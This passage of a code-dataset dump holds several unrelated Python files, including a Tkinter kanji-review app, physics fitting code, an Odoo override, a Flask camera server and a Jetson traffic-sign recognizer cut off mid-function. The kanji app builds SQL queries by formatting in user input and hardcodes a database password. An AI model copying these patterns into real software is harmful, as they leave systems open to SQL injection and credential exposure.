self.Kanjicontent = tk.StringVar()\r\n\r\n # Adding the Entry for Keyword\r\n self.KeywordEntry = tk.Entry(self.KeywordCanvas, width = 25, fg = \"#C71150\", textvariable = self.Keywordcontent)\r\n self.KeywordEntry.pack(side = \"left\")\r\n\r\n # Adding the Entry for Kanji\r\n self.KanjiEntry = tk.Entry(self.KanjiCanvas, width = 25, fg = \"#C71150\", textvariable = self.Kanjicontent)\r\n self.KanjiEntry.pack(side = \"left\")\r\n\r\n\r\n\r\n\r\n # Buttons ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding button to close window\r\n self.AddKanjiCloseButton = tk.Button(self.ButtonsCanvas, text = \"Go back\", width = 20, command = self.master.destroy)\r\n self.AddKanjiCloseButton.pack(side = \"left\", padx = 4)\r\n\r\n # Adding the button that effectivelly adds the Kanji\r\n self.AddButton = tk.Button(self.ButtonsCanvas, text = \"Add kanji\", width = 20, command = self.addKanji)\r\n self.AddButton.pack(side = \"left\", padx = 4)\r\n\r\n \r\n\r\n\r\n\r\n # Functions ------------------------------------------------------------------------------------------------------------\r\n\r\n # Defining the function that adds the new kanji and keyword to the list\r\n def addKanji(self):\r\n\r\n # Adressing any mistake befor connecting to the database and making changes\r\n if len(self.Keywordcontent.get()) == 0:\r\n self.empty_keyword()\r\n elif len(self.Kanjicontent.get()) == 0:\r\n self.empty_kanji()\r\n else:\r\n \r\n # Connecting to the database\r\n conn = psycopg2.connect(\r\n host = \"localhost\",\r\n database = \"review\",\r\n user = \"postgres\",\r\n password = \"35c4p3fromh3ll\",\r\n port = \"5432\"\r\n ) \r\n \r\n # Creating the cursor\r\n cur = conn.cursor()\r\n\r\n # Creating the table if it does not exist\r\n create_table = \"CREATE TABLE IF NOT EXISTS review (id SERIAL PRIMARY KEY, keyword VARCHAR(50) NOT NULL, kanji VARCHAR(30) NOT NULL)\"\r\n cur.execute(create_table)\r\n # Commiting the table creation\r\n conn.commit()\r\n \r\n\r\n # Getting the content from the keyword and kanji Entry input\r\n keyword_ = self.Keywordcontent.get().upper()\r\n kanji_ = self.Kanjicontent.get()\r\n\r\n # Creating the error exceptions after the database connection\r\n\r\n # Checking if the keyword or kanji is already in the database\r\n check_if_keyword_data_exists = \"SELECT * FROM review WHERE keyword = '{}'\"\r\n check_if_kanji_data_exists = \"SELECT * FROM review WHERE kanji = '{}'\"\r\n\r\n cur.execute(check_if_keyword_data_exists.format(keyword_))\r\n keyword_checker = cur.fetchall()\r\n cur.execute(check_if_kanji_data_exists.format(kanji_))\r\n kanji_checker = cur.fetchall()\r\n\r\n if len(keyword_checker) != 0:\r\n self.existing_keyword()\r\n cur.close()\r\n conn.close()\r\n elif len(kanji_checker) != 0:\r\n self.existing_kanji()\r\n cur.close()\r\n conn.close()\r\n else:\r\n\r\n \r\n # Adding the keyword and kanji to the table\r\n \r\n inserting_data = \"INSERT INTO review (keyword, kanji) VALUES (%s, %s)\"\r\n cur.execute(inserting_data,(keyword_,kanji_))\r\n print(\"The kanji and keyword has been added succesfully\")\r\n # Commiting the insertion\r\n conn.commit()\r\n\r\n cur.close()\r\n conn.close()\r\n\r\n\r\n\r\n\r\n# Errors and Messages ------------------------------------------------------------------------------------------------------------\r\n\r\n # Warning for empty keyword entry\r\n def empty_keyword(self):\r\n tk.messagebox.showwarning(title = \"Empty Keyword Entry\", message = \"Please enter a keyword\")\r\n\r\n\r\n # Warning for empty kanji entry\r\n def empty_kanji(self):\r\n tk.messagebox.showwarning(title = \"Empty Kanji Entry\", message = \"Please enter a kanji\")\r\n \r\n\r\n # Warning for already existant keyword in database\r\n def existing_keyword(self):\r\n tk.messagebox.showwarning(title = \"Existing Keyword\", message = \"This keyword is already in the database!\")\r\n\r\n \r\n # Warning for empty kanji entry\r\n def existing_kanji(self):\r\n tk.messagebox.showwarning(title = \"Existing Kanji\", message = \"This kanji is already in the database!\")\r\n\r\n\r\n\r\n \r\n\r\n# Running app ------------------------------------------------------------------------------------------------------------\r\n\r\nroot = tk.Tk()\r\napp = MainWindow(root)\r\nroot.mainloop()","repo_name":"HeiwaRyuu/Python-App-KanjiReview","sub_path":"ReviewApp/All Review Backups/GUI - ADDING FUNCTION WORKING (BACKUP).py","file_name":"GUI - ADDING FUNCTION WORKING (BACKUP).py","file_ext":"py","file_size_in_byte":10262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32457508439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom datetime import datetime\nimport os as os\nimport lambdafit\nimport imp\nimport pandas as pd\n\n#assumes that you have taken SQUID data using Shawn's code \n\ndef fit_squid_data(self, datafile, band):\n #assumes one band and one power\n \n all_raw_data=np.load(datafile)\n all_raw_data=all_raw_data.item()\n \n \n power = list(all_raw_data[band].keys())[0]\n \n #assume there is only one power\n raw_data=all_raw_data[band][power]\n \n #a definition \n def redchisq(ydata, ymod):\n chisq=np.sum((ydata-ymod)**2) \n return chisq \n \n #make your dataframe to store the fitted values\n d_squid = {'smurf_band':[],\n 'smurf_chan':[],\n 'chi2':[], \n 'I0':[],\n 'm':[],\n 'f2':[],\n 'p2p':[], \n 'lamb':[], \n 'phi0_file':[]}\n \n d_squid = pd.DataFrame(d_squid)\n \n \n #now fit each curve\n bias=all_raw_data['bias']\n \n for chan in raw_data['channels']:\n chf=raw_data['fvsfr'][np.where(raw_data['channels']==chan)[0][0]]\n chan_params = lambdafit.lambdafit(bias, chf*1000)\n \n #get chi sq\n fit_chf = lambdafit.f0ofI(bias, chan_params[0], chan_params[1], chan_params[2], chan_params[3], chan_params[4])\n chisq = redchisq(chf*1000, fit_chf)\n \n #assign variable to make writing to df easier\n I0,m,f2,p2p,lamb = chan_params\n d_squid = d_squid.append({'smurf_band': band, 'smurf_chan':chan, 'chi2':chisq, 'I0':I0, 'm':m, 'f2':f2, 'p2p':p2p, 'lamb':lamb, 'phi0_file':datafile}, ignore_index=True)\n \n #and return the dataframe with all the fitted paramters\n return d_squid","repo_name":"simonsobs/readout-script-dev","sub_path":"heather/output_squid_fits.py","file_name":"output_squid_fits.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"46720566217","text":"from setuptools import setup\n\ninstall_requires = [\n \"aiohttp>=3.6.0\",\n \"discord.py==1.3.3\",\n \"EsiPy==1.2.2\",\n \"dynaconf==2.2.3\",\n \"redis==3.5.3\",\n \"requests==2.24.0\",\n \"dhooks==1.1.3\",\n \"black==19.10b0\",\n \"loguru==0.5.1\",\n \"asgiref==3.2.10\",\n \"dataclasses-json==0.5.5\",\n]\n\nsetup(\n name=\"contract-appraisal-bot\",\n version=\"0.0.1\",\n packages=[\"\"],\n url=\"\",\n license=\"\",\n author=\"Ben Cole\",\n author_email=\"\",\n description=\"\",\n install_requires=install_requires,\n)\n","repo_name":"wengole/contract-appraisal-bot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"42488391905","text":"tabby_cat = \"\\tI'm tabbed in.\" #gives space on the string\npersian_cat = \"i'm split\\non a line\" # /n puts the string after it on the next line\nbackslash_cat = \"i'm \\\\ a \\\\ cat.\" # its just put slashes on the string\n\n\nfat_cat = '''\nI'll do a list:\n\\t* cat foo\n\\t* Fishies\n\\t* Catnip\\n\\t* Grass\n'''\nprint (tabby_cat)\nprint (persian_cat)\nprint (backslash_cat)\nprint (fat_cat)\n","repo_name":"andreas-panagi/LPTHW-Exercise","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"31082329143","text":"import argparse\nimport csv\nimport random\nimport os\n\n\ndef arguments_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', \"--prodacts\", type=int, required=True)\n parser.add_argument('-l', \"--low_value\", type=int, default = 1)\n parser.add_argument('-u', \"--upper_value\", type=int, default = 100)\n parser.add_argument('-f', \"--file_name\", required=True)\n parser.add_argument('-s', \"--start_number\", type=int, default = 1)\n parser.add_argument('-e', \"--end_number\", type=int, default = 1)\n return parser.parse_args()\n\n\ndef main():\n args = arguments_parser()\n path = \"{}_{}_{}_{}\".format(args.file_name, str(args.prodacts), str(args.low_value), str(args.upper_value))\n try:\n os.mkdir(path)\n\n except OSError:\n print (\"Creation of the directory %s failed\" % path)\n return\n\n for file_number in range(args.start_number, args.end_number + 1):\n csv_file = \"{}_{}_{}_{}#{}.csv\".format(args.file_name, str(args.prodacts), str(args.low_value), str(args.upper_value), str(file_number))\n csv_columns = ['pid','duration']\n threads = []\n for item_number in range(1, args.prodacts + 1):\n duration = random.randint(args.low_value, args.upper_value)\n threads.append({\"pid\": item_number, \"duration\": duration})\n\n try:\n with open(csv_file, 'w+') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for data in threads:\n writer.writerow(data)\n\n os.rename(csv_file, path + \"/\" + csv_file)\n except IOError:\n print(\"I/O error\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"danielifshitz/AI_project","sub_path":"problem_generator.py","file_name":"problem_generator.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32395267116","text":"from odoo import fields, models\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = \"account.move.line\"\n\n def _get_computed_account(self):\n ctx = self._context\n sales_team = False\n if ctx.get('team_id'):\n sales_team = self.env['crm.team'].browse(\n self._context.get('team_id') or self._context['team_id'])\n elif ctx.get('order'):\n sales_team = ctx['order'].team_id\n\n if sales_team and sales_team.name == 'GreenStalk Gardens store':\n bigcomm_sale_acc = self.env['account.account'].search([('code', '=', '4040')])\n return bigcomm_sale_acc\n elif sales_team and sales_team.name == 'Amazon':\n amazon_sale_acc = self.env['account.account'].search([('code', '=', '4030')])\n return amazon_sale_acc\n\n return super(AccountInvoiceLine, self)._get_computed_account()\n","repo_name":"Captivea-JDU/GreenStalk-Vertical-Gardens","sub_path":"ksc_separate_account/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"27211327866","text":"#!/usr/bin/env python\n\nimport pantilthat\nfrom sys import exit\nimport picamera\nimport threading\n\ntry:\n from flask import Flask, render_template\nexcept ImportError:\n exit(\"This script requires the flask module\\nInstall with: sudo pip install flask\")\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('gui.html')\n\n@app.route('/api//')\ndef api(direction, angle):\n if angle < 0 or angle > 180:\n return \"{'error':'out of range'}\"\n\n angle -= 90\n\n if direction == 'pan':\n pantilthat.pan(angle)\n return \"{{'pan':{}}}\".format(angle)\n\n elif direction == 'tilt':\n pantilthat.tilt(angle)\n return \"{{'tilt':{}}}\".format(angle)\n\n return \"{'error':'invalid direction'}\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=9595, debug=True)\n# camera = picamera.PiCamera()\n# camera.rotation = 180\n# camera.resolution = (640, 480)\n# camera.start_recording('my_video.h264')\n# camera.wait_recording(60)\n# camera.stop_recording()\n","repo_name":"SuperFunkyNinja/CameraStuff","sub_path":"pantiltweb.py","file_name":"pantiltweb.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"17058675965","text":"#!/usr/bin/python3\n#\n#./tsr-camera.py --model=resnet18_e34.onnx --input_blob=input_0 --output_blob=output_0 --labels=labels.txt --video=1\n#./tsr-camera.py --model=resnet18_e34.onnx --input_blob=input_0 --output_blob=output_0 --labels=labels.txt --video=1 --display=1\n# note: with --video=1, the frame rate drops by approx.10fps\n\n#\nimport jetson.inference\nimport jetson.utils\n#from jetcam.csi_camera import CSICamera\n#from jetcam.usb_camera import USBCamera\n#\nimport argparse\nimport sys\nfrom datetime import datetime\n#\nimport ctypes\nimport numpy as np\nimport cv2\nfrom skimage import exposure\n#\n# pip3 install pyserial\nimport serial\n#\nfrom tsrvideosave import TSRvideoSave\nfrom tsrframesave import TSRframeSave\n# parse the command line\nparser = argparse.ArgumentParser(description=\"Classify a live camera stream using an image recognition DNN.\", \n\t\t\t\t\t\t formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.imageNet.Usage())\n# args\nparser.add_argument(\"--network\", type=str, default=\"googlenet\", help=\"pre-trained model to load (see below for options)\")\nparser.add_argument(\"--camera\", type=str, default=\"0\", help=\"index of the MIPI CSI camera to use (e.g. CSI camera 0)\\nor for VL42 cameras, the /dev/video device to use.\\nby default, MIPI CSI camera 0 will be used.\")\nparser.add_argument(\"--width\", type=int, default=1280, help=\"desired width of camera stream (default is 1280 pixels)\")\nparser.add_argument(\"--height\", type=int, default=720, help=\"desired height of camera stream (default is 720 pixels)\")\nparser.add_argument(\"--display\", type=int, default=0, help=\"render stream to DISPLAY\")\nparser.add_argument(\"--video\", type=int, default=0, help=\"save stream to ./raw/ storage\")\nparser.add_argument(\"--file\", type=str, help=\"filename of the video to process\")\nparser.add_argument(\"--nolearn\", type=int, default=0, help=\"filename of the video to process\")\nparser.add_argument(\"--with_ui\", type=int, default=1, help=\"show everything on the display\")\n# parse args\ntry:\n\topt = parser.parse_known_args()[0]\nexcept:\n\tprint(\"\")\n\tparser.print_help()\n\tsys.exit(0)\n#\ntry:\n ser = None #serial.Serial ('/dev/ttyTHS1', 9600, timeout=1)\nexcept:\n print(\"\")\n print ('!serial port NOT accessible')\n ser = None\n #sys.exit(0)\n#\n#ensure directories are created for learning\n\n# open the serial port\nif ser is not None and ser.isOpen ():\n print (ser.name + ' is open...')\n #\n st = 'v'\n ser.write (st.encode ())\n st = 'rrrr'\n ser.write (st.encode ())\n# st = ' '\n# ser.write (st.encode ())\n#\ndef write_to_7seg (val):\n if ser is None:\n return\n #never access the serial twice for the same value\n if write_to_7seg._mval == val:\n return\n #\n write_to_7seg._mval = val\n if val == -1:\n st = ' '\n else:\n st = '{:4d}'.format (val)\n #\n ser.write (st.encode ())\nwrite_to_7seg._mval = -2\n#\n# don't store signs and frames\nnolearn = False\nif opt.nolearn == 1:\n nolearn = True\nif nolearn == False:\n # create directories\n print('check learning storage')\n import os\n if not os.path.exists('../raw'):\n print('creating {}'.format('../raw'))\n os.makedirs('../raw')\n os.makedirs('../raw/_unk')\n # create label dirs\n lines = [line.rstrip('\\n') for line in open('./labels.txt')]\n for dirs in lines:\n #print('creating dir for label {}'.format('../raw/' + dirs))\n if not os.path.exists('../raw/' + dirs):\n print('creating {}'.format('../raw/' + dirs))\n os.makedirs('../raw/' + dirs)\n #\n# save video stream from camera\nsave_video = False\nif opt.video == 1:\n save_video = True\n#use video file?\nvideo_file = False\nif opt.file is not None:\n video_file = True\n print(\"using video file from {:s}\".format(opt.file))\n save_video = False\n# use CSI/USB camera or gstCamera\ncsi_camera = True\n# show frame from camera on display\nshow_display = False\nif opt.display == 1:\n show_display = True\n#--with-ui\nshow_ui = True\nif opt.with_ui == 0:\n show_ui = False\n# use ESC key to end the task\nESC = 27\nshow_fps = True\n#\nlFps_sec = 0 #current second\nlFps_c = 0 #current fps\nlFps_k = 0 #current frames\nlFps_M = 0 #max fps\nlFps_T = 0 #tot\nlFps_rS = 0 #running seconds\ncFk = 0 #frame count\n#\ncs_sec = 0\ncs_spd = 0\n# red circle radius\nc_r_min = 8#8-720p #5 #10\nc_r_max = 40#40-720p #25 #50\n\n#this is red\nlower_col1 = np.array ([0, 50, 50])\nupper_col1 = np.array ([10, 255, 255])\n#\nlower_col2 = np.array ([170, 50, 50])\nupper_col2 = np.array ([180, 255, 255])\n#\nkFot = 0 #count of saved frames\n##\n# load speed limit signs\nsign_white = cv2.imread('./ref/all-speeds-white.jpg')\nsign_black = cv2.imread('./ref/all-speeds-black.jpg')\n#\ndef extract_sign(speed, dark):\n # all signs is: 1000x600px\n # idx = row * W + col; row = (idx - col) / W\n sidx = speed // 10 - 1\n scol = sidx % 5\n srow = (sidx - scol) // 5\n #print ('sign index %d, %d' % (srow, scol))\n if dark == True:\n return sign_black[srow*200:srow*200+200, scol*200:scol*200+200]\n return sign_white[srow*200:srow*200+200, scol*200:scol*200+200]\n#POV definition\n# source 1280x720\n# of interest povs\n# xx >= 640 - right half\n# yy <= 360 - top half\n# xx: 320..640..960\n# yy: 180..360..540\n### for right side classification of traffic posts\n\"\"\"\n#c_xx = (640 + 160) # horizontal mid-point\nc_xx = (640 + 160 + 90) # horizontal mid-point\n#c_yy = 360 #c_ry # vertical mid-point\nc_yy = (360) #c_ry # vertical mid-point\n#c_rx = int (360 / 2) # horizontal width (half): x-rx, x+rx\nc_rx = int (240 / 2) # horizontal width (half): x-rx, x+rx\n#c_ry = int (360 / 2) # vertical width (half): y-ry, y+ry\nc_ry = int ((360-90) / 2) # vertical width (half): y-ry, y+ry\n\"\"\"\n## use percentage values: 0.0..1.0 - 0..100%\nctrx = 0.5 # POV horizontal center %: left to right\nctry = 0.4 # POV vertical center %: top to bottom\nsizx = 0.5 # POV width %\nsizy = 0.25 # POV heigth %\n#sizy = 0.2\n### for mid side/overhead classification of traffic signs\n#c_xx = (640 + 160) # horizontal mid-point\nc_xx = int(opt.width * ctrx) # horizontal mid-point\n#c_yy = 360 #c_ry # vertical mid-point\nc_yy = int(opt.height * ctry) #c_ry # vertical mid-point\n#c_rx = int (360 / 2) # horizontal width (half): x-rx, x+rx\nc_rx = int(opt.width * sizx / 2) # horizontal width (half): x-rx, x+rx\n#c_ry = int (360 / 2) # vertical width (half): y-ry, y+ry\nc_ry = int(opt.height * sizy / 2) # vertical width (half): y-ry, y+ry\n#\ndef store_image(img, desc, kts, kout, confi, sp):\n #global c_xx, c_yy, c_rx, c_ry\n #print(\"sign at: {:d}x{:d}r{:d}\".format(int(sp[0]+c_xx - c_rx), int(sp[1]+c_yy - c_ry), int(sp[2])))\n #\n if nolearn == True:\n return\n if img is None:\n return\n iname = None\n if confi == 0:\n if desc is None:\n # store frame - confi = 0\n iname = \"./raw/_unk/img-{}_{}-frame.jpg\".format (kts, kout)\n else:\n # store frame - confi = 0\n iname = \"./raw/{}/img-{}_{}-frame.jpg\".format (desc, kts, kout)\n else:\n if desc is None:\n # save sign for classification training\n iname = \"./raw/_unk/img-{}_{}-ori-c{}.jpg\".format (kts, kout, confi)\n else:\n # save relevant'ish sign\n iname = \"./raw/{}/img-{}_{}-sign-c{}.jpg\".format (desc, kts, kout, confi)\n if iname is not None:\n # save image/frame\n global tsr_fs\n tsr_fs.save (iname, img)\n#\ndef img_subrange (img):\n #crop the image area containing the circle\n # subtract the interesting frame\n global c_xx, c_yy, c_rx, c_ry\n return img.copy()[c_yy - c_ry:c_yy + c_ry, c_xx - c_rx:c_xx + c_rx]\n#\n\"\"\"are you using one of the SSD-Mobilenet/Inception models? \nIf so, try changing the class names that you want to ignore to 'void' \n(without the '') in the labels file (e.g. /data/networks/SSD-Mobilenet-v2/ssd_coco_labels.txt). \nThe classes with the name void will then be ignored during detection.\n\"\"\"\ndef do_detect (cuda_mem, width, height):\n # detect objects in the image (with overlay)\n return detnet.Detect (cuda_mem, width, height, \"box,labels,conf\")\n#\ndef do_ai (tsr_img, kTS, kFot, sub_img, dfy, cfy, sign_pos):\n width = tsr_img.shape[0]\n height = tsr_img.shape[1]\n confi = 0\n #cv2.imwrite (iname, final)\n #iname = \"./raw/thd-image-{}_{}.png\".format (kTS, kFot)\n tsr_imga = cv2.cvtColor (tsr_img, cv2.COLOR_BGR2RGBA)\n cuda_mem = jetson.utils.cudaFromNumpy (tsr_imga)\n # do object detection\n if dfy == True:\n detections = detnet.Detect (cuda_mem, width, height, \"box,labels,conf\")\n if len (detections) > 0:\n print(\"detected {:d} objects in image\".format(len(detections)))\n iname = \"./raw/_objs/img-{}_{}-cuda-o{}.jpg\".format (kTS, kFot, 0)\n #jetson.utils.saveImageRGBA (iname, cuda_mem, width, height)\n #for detection in detections:\n # print(detection)\n # print out timing info\n #net.PrintProfilerTimes()\n #print (cuda_mem)\n #\n # do classification\n if cfy == True:\n class_idx, confidence = imgnet.Classify (cuda_mem, width, height)\n confi = int (confidence * 1000)\n if class_idx >= 0:# and confi > 800: # or confidence * 100) > 60:\n # find the object description\n class_desc = imgnet.GetClassDesc (class_idx)\n #print (\"found sign {:d} {:s} on {:d}\".format (confi, class_desc, kFot))\n # save ROI\n if confi > 800: # over 99% confidence\n #save relevant'ish sign\n store_image(tsr_img, class_desc, kTS, kFot, confi, sign_pos)\n # save originating frame, for reference\n if sub_img is not None:\n # store frame - confi = 0\n store_image(sub_img, class_desc, kTS, kFot, 0, sign_pos)\n else:\n #save sign for classification training - desc None\n store_image(tsr_img, None, kTS, kFot, confi, sign_pos)\n # save originating frame, for reference\n if sub_img is not None:\n # store frame - confi = 0\n store_image(sub_img, None, kTS, kFot, 0, sign_pos)\n #\n # overlay the result on the image\n if confi > 994: # over 99.4% confidence\n #print (\"found sign {} {:s} fps {}\".format (confi, class_desc, net.GetNetworkFPS ()))\n # update the indicator\n global cs_spd\n if class_idx == 0:#kph20\n cs_spd = 20\n if class_idx == 1:#kph30\n cs_spd = 30\n if class_idx == 2:#kph50\n cs_spd = 50\n if class_idx == 3:#kph60\n cs_spd = 60\n if class_idx == 4:#kph70\n cs_spd = 70\n if class_idx == 5:#kph80\n cs_spd = 80\n if class_idx == 6:#kph100\n cs_spd = 100\n if class_idx == 7:#kph120\n cs_spd = 120\n #\n global cs_sec, lFps_rS\n cs_sec = lFps_rS\n print (\"%dkph sign %d %s on %d\" % (cs_spd, confi, class_desc, kFot))\n # store captured sign for display\n global ui_find, ui_sign\n ui_find = tsr_img\n # is this a new speed limit?\n if int(do_ai._lspd) != int(cs_spd):\n do_ai._lspd = int(cs_spd)\n print (\"NEW %dkph sign %d %s on %d\" % (cs_spd, confi, class_desc, kFot))\n #\n return confi\n#\ndo_ai._lspd = -1\n##\nref_frames = 90\ndef check_red_circles (image, kTS):\n sub_img = img_subrange (image)\n \"\"\"\n #print('subimg shape {}'.format(sub_img))\n sub_img = exposure.equalize_adapthist (sub_img, clip_limit=0.1)\n #print('subimg equ shape {}'.format(sub_img))\n sub_img *= 255\n sub_img = sub_img.astype(np.uint8)\n #sub_img = cv2.cvtColor(sub_img, cv2.COLOR_RGB2BGR)\n #print('subimg cnv shape {}'.format(sub_img))\n \"\"\"\n # reset frames count on 0\n if check_red_circles._lcf == 0:\n check_red_circles._lcf = ref_frames\n # if we have identified a sign, skip the next ref_frames frames\n if nolearn == True and check_red_circles._lcf < ref_frames:\n check_red_circles._lcf = check_red_circles._lcf - 1\n return sub_img\n # process subimage\n #blurred = cv2.blur (sub_img, (5, 5))\n blurred = cv2.GaussianBlur (sub_img, (5, 5), 0)\n #canny = cv2.Canny (blurred, 50, 150)\n hsv = cv2.cvtColor (blurred, cv2.COLOR_BGR2HSV)\n #hsv = cv2.cvtColor (blurred, cv2.COLOR_RGB2HSV)\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n # lower mask (0-10)\n #mask0 = cv2.inRange (hsv, lower_white, upper_white)\n mask0 = cv2.inRange (hsv, lower_col1, upper_col1)\n # upper mask (170-180)\n mask1 = cv2.inRange (hsv, lower_col2, upper_col2)\n # join my masks\n cmask = mask0 + mask1\n #cmask = mask1\n #\n result = sub_img\n #result = cmask\n #cmask = cv2.erode (cmask, None, iterations=2)\n #cmask = cv2.dilate (cmask, None, iterations=2)\n #iname = \"./raw/mask-{}.png\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n #cv2.imwrite (iname, cmask)\n #detect circles\n circles = cv2.HoughCircles (cmask, cv2.HOUGH_GRADIENT, 1, \n 200, param1=100, param2=20, minRadius=c_r_min, maxRadius=c_r_max)\n # 60, param1=100, param2=20, minRadius=c_r_min, maxRadius=c_r_max)\n #process circles\n c_x = 0\n c_y = 0\n c_r = 0\n if circles is not None:\n #kTS = \"{}\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n #iname = \"/mnt/raw/img-{}-frame.png\".format (kTS)\n #circles = np.uint16 (np.around (circles))\n for i in circles[0,:]:\n c_x = int(i[0])\n c_y = int(i[1])\n c_r = int(i[2]) #autocrop the 'red' circle\n #print(\"#i:detected circle {}x{}r{}\".format(c_x, c_y, c_r))\n if c_x > c_r and c_y > c_r: #and c_r > 6\n tsr_img = sub_img.copy()\n c_r = c_r + 10 # store a bigger sign frame for better identification\n sx = c_x - c_r\n sy = c_y - c_r\n sw = c_r * 2\n sh = c_r * 2\n if sx < 0:\n sx = 0\n if sy < 0:\n sy = 0\n tsr_img = tsr_img[sy:sy + sh, sx:sx + sw]\n #\n global kFot\n kFot = kFot + 1\n # skip frames if we found good sign, over 994\n if do_ai (tsr_img, kTS, kFot, image, False, True, i) > 994:\n check_red_circles._lcf = ref_frames - 1\n #\n if show_display == True:\n cv2.circle (result, (c_x, c_y), c_r, (0,0,255), 2)\n #.for\n #.if circles is not None:\n #\n #return tsr_img\n #return canny\n return result\n#\ncheck_red_circles._lcf = ref_frames\n##\ndef update_pov (key):\n #\n global ctrx, ctry, sizx, sizy, c_xx, c_yy, c_rx, c_ry\n #\n m_h = 0.0\n m_v = 0.0\n s_h = 0.0\n s_v = 0.0\n new_pov = False\n # move POV\n povg = 0.01\n if key == ord('a'):\n #left\n if (ctrx - sizx / 2 - povg) > 0.0:\n m_h = -povg\n new_pov = True\n if key == ord('d'):\n #right\n if (ctrx + sizx / 2 + povg) < 1.0:\n m_h = povg\n new_pov = True\n if key == ord('w'):\n #up\n if (ctry - sizy / 2 - povg) > 0.0:\n m_v = -povg\n new_pov = True\n if key == ord('s'):\n #down\n if (ctry + sizy / 2 + povg) < 1.0:\n m_v = povg\n new_pov = True\n # size POV\n if key == ord('A'):\n #horiz reduce\n if (ctrx - sizx / 2 - povg) > 0.0:\n s_h = -povg\n new_pov = True\n if key == ord('D'):\n #horiz enlarge\n if (ctrx + sizx / 2 + povg) < 1.0:\n s_h = povg\n new_pov = True\n if key == ord('W'):\n #vert reduce\n if (ctry - sizy / 2 - povg) > 0.0:\n s_v = -povg\n new_pov = True\n if key == ord('S'):\n #vert enlarge\n if (ctry + sizy / 2 + povg) < 1.0:\n s_v = povg\n new_pov = True\n #compute new POV\n if new_pov == True:\n ctrx = ctrx + m_h\n ctry = ctry + m_v\n sizx = sizx + s_h\n sizy = sizy + s_v\n c_xx = int(opt.width * ctrx) # horizontal mid-point\n c_yy = int(opt.height * ctry) #c_ry # vertical mid-point\n c_rx = int(opt.width * sizx / 2) # horizontal width (half): x-rx, x+rx\n c_ry = int(opt.height * sizy / 2) # vertical width (half): y-ry, y+ry\n print(\"POV {:.2f}x{:.2f}-{:.2f}x{:.2f}/{:d}x{:d}-{:d}x{:d}\".format(ctrx, ctry, sizx, sizy, c_xx, c_yy, c_rx * 2, c_ry * 2))\n #\n##\n#\n# get screen size on Linux\n# import struct, os, sys, fcntl\n# fbfd = os.open('/dev/fb0',os.O_RDWR)\n# struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))\n# (720, 480, 720, 480, 0, 0, 32, 4294967168, 16, 8, 4189770400, 8, 8, 4294967232, 0, 8, 140676952, 24, 8, 4294967232, 1, 0, 4278129984, 4294967232, 4157961728, 37037, 60, 16, 30, 9, 62, 6, 0, 6291456, 4189770832, 0, 0, 0, 0, 0)\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))[0]\n# 720\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))[1]\n# 480\ntry:\n import struct, os, fcntl\n fbfd = os.open('/dev/fb0', os.O_RDWR)\n fbinfo = fcntl.ioctl(fbfd, 0x4600, \" \"*160)\n _SW = int(struct.unpack(\"8I12I16I4I\", fbinfo)[0])\n # 720\n _SH = int(struct.unpack(\"8I12I16I4I\", fbinfo)[1])\n # 480\n os.close(fbfd)\nexcept:\n _SW = 720\n _SH = 480\n#\n_SW = 480\n_SH = 320\nprint ('display size: %dx%d' % (_SW, _SH))\n_hSH = _SH//2\n_hSW = _SW//2\n##\nui_sign = None\nui_find = None\nui_shot = None\n#fb = np.memmap('/dev/fb2', dtype='uint8',mode='r+', shape=(320, 480, 4))\nfb = np.memmap('/dev/fb2', dtype='uint8',mode='r+', shape=(320, 480, 2))\n#\n### - from https://github.com/adafruit/Adafruit_CircuitPython_RGB_Display\ndef color565(r, g=0, b=0):\n \"\"\"Convert red, green and blue values (0-255) into a 16-bit 565 encoding. As\n a convenience this is also available in the parent adafruit_rgb_display\n package namespace.\"\"\"\n try:\n r, g, b = r # see if the first var is a tuple/list\n except TypeError:\n pass\n return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3\n\ndef image_to_data(data):\n \"\"\"Generator function to convert a PIL image to 16-bit 565 RGB bytes.\"\"\"\n #NumPy is much faster at doing this. NumPy code provided by:\n #Keith (https://www.blogger.com/profile/02555547344016007163)\n #data = np.array(data.convert('RGB')).astype('uint16')\n #npframe = np.zeros((320, 480, 3), dtype=np.uint16) #+ (255, 255, 255) # background color (0, 0, 0)\n #npframe[:, :] 